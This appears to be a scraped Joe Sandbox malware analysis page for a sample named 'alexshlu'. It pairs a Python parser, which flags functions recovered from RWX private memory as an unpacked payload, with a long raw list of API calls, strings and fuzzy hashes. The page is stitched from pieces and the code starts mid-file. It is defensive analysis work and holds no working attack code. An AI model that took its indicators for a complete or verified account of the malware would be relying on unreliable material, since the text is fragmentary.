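PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
# "Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function X: "
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>[\w:]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(r"^Source File: (?P<file>\S+\.sdmp), Offset: [0-9A-F]+, based on PE: (?P<pe>\w+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: int
    subcall_of: Optional[str]  # callee address when Joe Sandbox attributes the call to a subcall

@dataclass
class Region:
    base: int
    protect: str
    mem_type: str

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    region: Optional[Region] = None
    based_on_pe: bool = False
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

def decode_region(source_file: str) -> Region:
    p = source_file.split(".")  # assumed field order, see module docstring
    protect, mtype = int(p[4], 16), int(p[6], 16)
    return Region(int(p[3], 16), PAGE_PROTECT.get(protect, hex(protect)), MEM_TYPE.get(mtype, hex(mtype)))

def parse_report(text: str) -> List[FunctionRecord]:
    """One record per block; "Instruction Fuzzy Hash" is the last line of every block."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if m := API_RE.match(line):
            cur.apis.append(ApiCall(m["name"], m["mod"], m["args"] or "", int(m["ref"], 16), m["sub"]))
        elif m := SRC_RE.match(line):
            cur.region, cur.based_on_pe = decode_region(m["file"]), m["pe"] == "true"
        elif ": " in line:  # remaining "Key: value" lines; headers and unknown keys are skipped
            key, _, val = line.partition(": ")
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            elif key == "Opcode ID":
                cur.opcode_id = val
            elif key == "Instruction Fuzzy Hash":
                cur.instruction_fuzzy_hash = val
                records.append(cur)
                cur = FunctionRecord()
    return records

def api_sequence(rec: FunctionRecord) -> List[str]:
    """Direct calls in address order; subcall attributions are left out."""
    return [c.name for c in sorted(rec.apis, key=lambda c: c.ref) if c.subcall_of is None]

def rwx_private(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Functions recovered from writable+executable private memory: code that was never
    mapped from an image on disk, i.e. an unpacked or injected payload."""
    return [r for r in records if r.region is not None
            and r.region.protect == "PAGE_EXECUTE_READWRITE" and r.region.mem_type == "MEM_PRIVATE"]

# Excerpt of the blocks above (three functions; Associated/Snapshot/Similarity lines trimmed).
SAMPLE = """\
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
• Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 002A1F53
• RegisterClassW.USER32(?), ref: 002A1F6A
• CreateWindowExW.USER32 ref: 002A1FCA
• GetMessageW.USER32(Christmas Balls,00000000,00000000,00000000), ref: 002A2000
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• String ID: Christmas Balls$CreatingTool$Keep low...$[err id]: %i
• Instruction Fuzzy Hash: 91419070A28341DFD300DF24D849B2BB7E4BF9A704F00851DF9899B290DB70D954CB92
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A20F9
  • Part of subcall function 002B3E7D: CreateThread.KERNEL32(?,?,002B3F95,00000000,?,?), ref: 002B3EC6
• GetCurrentThreadId.KERNEL32 ref: 002A21AF
• std::_Throw_Cpp_error.LIBCPMT ref: 002A21E9
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Instruction Fuzzy Hash: 1631B3B1A60301BBE720AF659C07B9A77A49F47B40F004419FA4D6A1C5EFB49974CFA3
"""
```

Running parse_report over a whole exported function list and then rwx_private on the result gives the set of functions that belong to the unpacked payload rather than the loader, which is where reversing effort should go first. The two sandbox-specific fields between protect and type (0x400 / 0x1 in the names above) are deliberately not decoded, because nothing on this page establishes their meaning; the Opcode ID and fuzzy-hash strings are kept verbatim so they can be used as keys to correlate the same function across reports.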
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 002ADECC
• __alloca_probe_16.LIBCMT ref: 002ADEF8
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 002ADF37
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002ADF54
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002ADF93
• __alloca_probe_16.LIBCMT ref: 002ADFB0
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002ADFF2
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002AE015
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                        • Opcode ID: dd8c7a5f7c7da022ea86dbc23978c5a9739825358631e6f98b1d59cbd452701b
                                                                                                                                                                                                                                        • Instruction ID: 5953da72a4d21e45971c979b69eb9f96989744b40ee20e649fe5458d8ddd4ff8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd8c7a5f7c7da022ea86dbc23978c5a9739825358631e6f98b1d59cbd452701b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C451C07292020BAFEF208F60DC45FAB7BA9EF46780F154429F916E6150DFB4DD218B50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction ID: 180e5ac06706b3467487e35fd0a98064ccc48ad8d2c1cde99aaf044395474790
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17B16A32E247569FDB11CF28CC82BEE7BA5EF55390F144165E904AB282F374D961CBA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEE37
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002AEE3F
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEEC8
                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002AEEF3
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEF48
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                        • Opcode ID: 3de6e295daf2a9b5d9d2e33ad6ce36f9acc2fc719d4e7bc9284b5da83eea8fb6
                                                                                                                                                                                                                                        • Instruction ID: 8b48c03b2c545f4d099e90daf337b5b9dfa60ae25d1cfec16a8da2d2292c58a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de6e295daf2a9b5d9d2e33ad6ce36f9acc2fc719d4e7bc9284b5da83eea8fb6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF41E830E20219AFCF10DF68C885A9EBBB5EF46324F158155E8149B352CB31DE22CF92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002ADD3B
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000,00000000,00000000), ref: 002ADD5A
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADD88
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDE3
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDFA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 66001078-3882152299
                                                                                                                                                                                                                                        • Opcode ID: 48ad1aff258f7f7391fd6aa0a3c86b338e5d909e1896a33729a1a763741fcb22
                                                                                                                                                                                                                                        • Instruction ID: 573ea131474d8e7ae42b36d1736daa81c00a0a3ca906362a62bcebb0aba576d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48ad1aff258f7f7391fd6aa0a3c86b338e5d909e1896a33729a1a763741fcb22
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B414931920A06DFCB20DF65D684AAAF3F4FF1A310B50492AD457DB950DB30EEA5CB50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,002BB9C1,002A34FA,?,00000000,002AA3DD,002A34FC,?,002BB596,00000022,FlsSetValue,002CE054,0-,002AA3DD), ref: 002BB973
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                        • Opcode ID: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
                                                                                                                                                                                                                                        • Instruction ID: 8bb3f163646e87e1c31abbbed64bc652bf503c40eb1a92d7cd699f6586d42355
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2210531E22616BBD7229F21EC85ADA3768DF417F0F250121EA15A72D0D7B0EE10CAE1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                                                                                        • String ID: <vB$B\$JC$OR$7Wu
                                                                                                                                                                                                                                        • API String ID: 1304948518-2341045906
                                                                                                                                                                                                                                        • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                                                                                                                                                                        • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002AB85E
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002AB868
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 002AB87F
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 002AB8A2
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002AB8D9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                        • String ID: py-
                                                                                                                                                                                                                                        • API String ID: 3716348337-278015880
                                                                                                                                                                                                                                        • Opcode ID: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
                                                                                                                                                                                                                                        • Instruction ID: 8d850d3751d76758f3a4042c6656202da125f311a65c64c3d96755402f5ca393
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2012632C241199FCF05EF68D8556ADB779BF46324F14480AE40167282DF789E21CF91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002AE142
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 002AE150
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002AE161
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                        • Opcode ID: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction ID: 700035741b7d7bc86205dd0d63477a797a386e104c5dd6db236b7aa9eadc0881
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65D0C976D67224AF8340EFB4FE0DD8A7BB4EB0E7523118523F905D2760EB748D148A96
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a4b127399a8ebdccafbcead12630ec078f7feab6ef1eefc808c646727befcd52
                                                                                                                                                                                                                                        • Instruction ID: 5d688dceaa04ccb42354ba0381f5a6502c488adfbe949c28194d58715452c3c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4b127399a8ebdccafbcead12630ec078f7feab6ef1eefc808c646727befcd52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83B11370E2424AAFDB11DF98D845FAEBBF1AF05314F148A5DE844A7282C7719E61CF60
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 002A589C
                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002A5A5B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task_strlen
                                                                                                                                                                                                                                        • String ID: ,$false$true
                                                                                                                                                                                                                                        • API String ID: 575380510-760133229
                                                                                                                                                                                                                                        • Opcode ID: 03fd8d804508cf03905c1273a76cd06c5e556b4aabd9921c9447e288ae0a09d4
                                                                                                                                                                                                                                        • Instruction ID: 1e409b8c41c26d624ef3b5fd67bc4f70cc7cb512df847b51d26d015600d94a8b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03fd8d804508cf03905c1273a76cd06c5e556b4aabd9921c9447e288ae0a09d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16C1D7B25183069FD310AF64CC85B6BB7E8EF91344F04492CF9958B242FB75D928CB92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,002B965B,002AEBD7,002AD9C8), ref: 002B9672
                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B9680
                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B9699
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,002B965B,002AEBD7,002AD9C8), ref: 002B96EB
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• type_info::operator==.LIBVCRUNTIME ref: 002BA04B
• CallUnexpected.LIBVCRUNTIME ref: 002BA2C4
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2673424686-393685449
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A3BFC
• std::_Lockit::_Lockit.LIBCPMT ref: 002A3C1A
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A3C3C
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A3CAA
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID: ios_base::badbit set
• API String ID: 593203224-3882152299
APIs
• __EH_prolog3.LIBCMT ref: 002AA5AD
• std::_Lockit::_Lockit.LIBCPMT ref: 002AA5BA
• std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
• std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
  • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CC8
  • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CEC
Similarity
• API ID: Lockitstd::_$Lockit::_Yarn$H_prolog3Lockit::~_
• String ID: bad locale name
• API String ID: 3084819986-1405518554
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,002CAD7A,000000FF,?,002B41AA,002B4091,?,002B4246,00000000), ref: 002B411E
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B4130
• FreeLibrary.KERNEL32(00000000,?,?,00000000,002CAD7A,000000FF,?,002B41AA,002B4091,?,002B4246,00000000), ref: 002B4152
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002BC10B
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002BC1D4
